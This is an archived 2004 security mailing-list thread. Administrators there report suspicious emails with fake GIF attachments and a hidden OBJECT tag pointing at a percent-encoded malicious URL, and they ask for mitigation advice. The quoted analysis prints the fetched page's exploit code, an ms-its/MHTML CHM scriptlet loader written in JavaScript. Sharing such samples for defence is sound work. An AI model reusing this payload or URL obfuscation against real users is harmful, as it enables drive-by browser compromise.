Ethical Hacking Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package. | Computer Forensics Training at InfoSec Institute Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors. |

| Subject: | RE: Virus from vikord.com? |
|---|---|
| Date: | Fri, 27 Aug 2004 17:12:37 -0400 |
I'm glad someone else saw this. I have had two instances of this today and noticed that the ".gif" file contained 45451212. I had one e-mail with the subject of "1" and one with the subject of "2". Both contained the attachment "1.gif." I also received the active x notification and did not pursue it further to realize there was a hidden url embedded in the message. After receiving your alert I looked deeper and found the same url listed. Something's going around. Thanks, Mike Michael Fredericks Network Administrator Nautic Partners, LLC -----Original Message----- From: Mason, Samuel [mailto:smason@state.mt.us] Sent: Friday, August 27, 2004 2:05 PM To: focus-virus@securityfocus.com Subject: Virus from vikord.com? Hello all, I'd like to see who else has run into this problem. We had a user receive a mail from what was supposed to me another State employee. The email had a GIF attachment (2.gif) With the subject line of "2". The GIF file was invalid and only contained the characters "45451212" The HTML in the message included this: <OBJECT data=http://www.v%69k%6F%72d.com/default.htm> which resolved to www.vikord.com.default.htm. The site is down with a "Service Temporarily Unavailable" message due to maintenance or capacity problems. I Googled for an answer and got a little info that included this: Quick snag with wget: wget http://www.v%69k%6F%72d.com/default.htm --14:26:50-- http://www.vikord.com/default.htm => `default.htm' Resolving www.vikord.com... 194.226.217.167 Connecting to www.vikord.com[194.226.217.167]:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] [ <=> ] 350 --.--K/s 14:26:56 (3.34 MB/s) - `default.htm' saved [350] username@coroner ~ $ cat default.htm <textarea id="code" style="display:none;"> <object data="ms-its:%6D%68%74%6D%6C:file://C:\drqwtt.mht!${PATH}/default.c hm:: /defa ult.htm" type="text/x-scriptlet"></object> </textarea> <script language="javascript"> document.write(code.value.replace(/\${PATH}/g,location.href.substring(0, loca tion.href.inde xOf('default.htm')))); </script> Which seems to indicate the original intent was to download a CHM file, correct? I'd like to know if someone else has seen this. Is this a known virus or something that I just could not find info for? The website is down, which is good, but how can we mitigate this on a more permanent basis? Our workstations indicated that the AtiveX control could not run and the page would not display properly but I am concerned that users may have lower security settings somewhere in the enterprise. Thanks for any help. Samuel Mason, CISSP OCP, Information Technology Services Division State of Montana ---------------------------------------CONFIDENTIALITY NOTICE-------------------------------------------- This message is intended only for the individual or entity to which it is addressed and may contain information that is privileged, confidential and exempt from disclosure under applicable law. If you are not the intended recipient, or the employee or agent responsible for delivering the message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited, and you are requested to please notify us immediately by telephone, and return the original message to us at the above address. Nautic Partners, LLC
| <Prev in Thread] | Current Thread | [Next in Thread> |
|---|---|---|
| ||
| Previous by Date: | re: system32\winamp.exe, Eric Stevenson |
|---|---|
| Next by Date: | Re: Virus from vikord.com?, Nick FitzGerald |
| Previous by Thread: | Re: Virus from vikord.com?, Bruce Martins |
| Next by Thread: | FW: system32\winamp.exe, Eric Stevenson |
| Indexes: | [Date] [Thread] [Top] [All Lists] |